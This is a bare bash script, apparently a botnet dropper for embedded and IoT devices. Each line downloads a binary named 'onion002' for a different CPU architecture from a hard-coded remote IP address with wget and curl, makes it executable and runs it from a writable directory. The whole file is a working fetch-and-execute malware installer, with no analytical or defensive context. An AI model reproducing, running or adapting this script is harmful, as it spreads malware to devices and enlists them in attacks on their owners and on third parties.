#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.x86; curl -O http://45.90.160.54/bins/onion002.x86;cat onion002.x86 >onion002;chmod +x *;./onion002 x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.mips; curl -O http://45.90.160.54/bins/onion002.mips;cat onion002.mips >onion002;chmod +x *;./onion002 mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.mpsl; curl -O http://45.90.160.54/bins/onion002.mpsl;cat onion002.mpsl >onion002;chmod +x *;./onion002 mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.arm; curl -O http://45.90.160.54/bins/onion002.arm;cat onion002.arm >onion002;chmod +x *;./onion002 arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.arm6; curl -O http://45.90.160.54/bins/onion002.arm6;cat onion002.arm6 >onion002;chmod +x *;./onion002 arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.arm7; curl -O http://45.90.160.54/bins/onion002.arm7;cat onion002.arm7 >onion002;chmod +x *;./onion002 arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.ppc; curl -O http://45.90.160.54/bins/onion002.ppc;cat onion002.ppc >onion002;chmod +x *;./onion002 ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.m68k; curl -O http://45.90.160.54/bins/onion002.m68k;cat onion002.m68k >onion002;chmod +x *;./onion002 m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.sh4; curl -O http://45.90.160.54/bins/onion002.sh4;cat onion002.sh4 >onion002;chmod +x *;./onion002 sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.spc; curl -O http://45.90.160.54/bins/onion002.spc;cat onion002.spc >onion002;chmod +x *;./onion002 spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/bins/onion002.arm5; curl -O http://45.90.160.54/bins/onion002.arm5;cat onion002.arm5 >onion002;chmod +x *;./onion002 arm5
